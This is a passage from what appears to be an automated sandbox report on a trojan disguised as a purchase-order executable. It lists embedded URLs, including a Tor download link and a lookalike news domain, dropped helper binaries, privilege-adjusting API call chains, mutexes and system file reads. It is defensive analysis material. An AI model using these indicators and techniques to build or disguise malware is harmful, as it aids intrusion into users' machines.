                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s615/0_GettyImages-1302496803.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://mab.data.tm-awx.com/rhs&quot;
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://myliverpoolnews.cf4
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://reach-id.orbit.tm-awx.com/analytics.js.gz
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://reachplc.hub.loginradius.com&quot;
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.mirror.co.uk/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drString found in binary or memory: https://sectigo.com/CPS0C
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drString found in binary or memory: https://sectigo.com/CPS0D
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://static.hotjar.com/c/hotjar-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://trinitymirror.grapeshot.co.uk/
                      Source: 08042021New-PurchaseOrder.exe String found in binary or memory: https://www.digicert.com/CPS0
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M3TH25P
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.co
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/andrew-robertson
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/champions-league
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/curtis-jones
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/georginio-wijnaldum
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/mohamed-salah
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/ozan-kabak
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/premier-league
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/sadio-mane
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/transfers
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/schedule/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/search/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, SWqTT.exe, 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Window created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      Initial sample is a PE file and has a suspicious name
                      Source: initial sample Static PE information: Filename: 08042021New-PurchaseOrder.exe
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Code function: 1_2_00A2CBB0 1_2_00A2CBB0
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Code function: 1_2_00A244E0 1_2_00A244E0
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Code function: 1_2_00A24C58 1_2_00A24C58
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Code function: 1_2_00A2CBA0 1_2_00A2CBA0
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe Code function: 32_2_010DA970 32_2_010DA970
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe Code function: 32_2_010D28B8 32_2_010D28B8
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe Code function: 32_2_010D22D0 32_2_010D22D0
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe Code function: 32_2_010DA96B 32_2_010DA96B
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: String function: 0040B550 appears 50 times
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784
                      Source: 08042021New-PurchaseOrder.exe Static PE information: invalid certificate
                      Source: AdvancedRun.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 08042021New-PurchaseOrder.exe Binary or memory string: OriginalFilename vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.306148340.0000000007CA8000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameHcAj CBJ.exe2 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000000.202307233.0000000000142000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.293666584.00000000044C0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.288756404.0000000000CB0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302392796.0000000006580000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.298745128.0000000005590000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRunPeBraba.dll6 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.288723697.0000000000CA0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dllj% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp Binary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAdvancedRun.exe8 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000011.00000000.276780249.0000000000FA2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe Binary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\F
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InProcServer32
                      Source: classification engine Classification label: mal96.troj.evad.winEXE@35/25@2/2
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 5_2_00408FC9
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 6_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 6_2_00408FC9
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle, 5_2_004095FD
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource, 5_2_0040A33B
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 5_2_00401306
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe File created: C:\Users\user\JMfuFTspQyAokpYkLoiLJnktrYABdrUoj
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4952
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe File created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f
                      Source: 08042021New-PurchaseOrder.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe File read: C:\Windows\System32\drivers\etc\hosts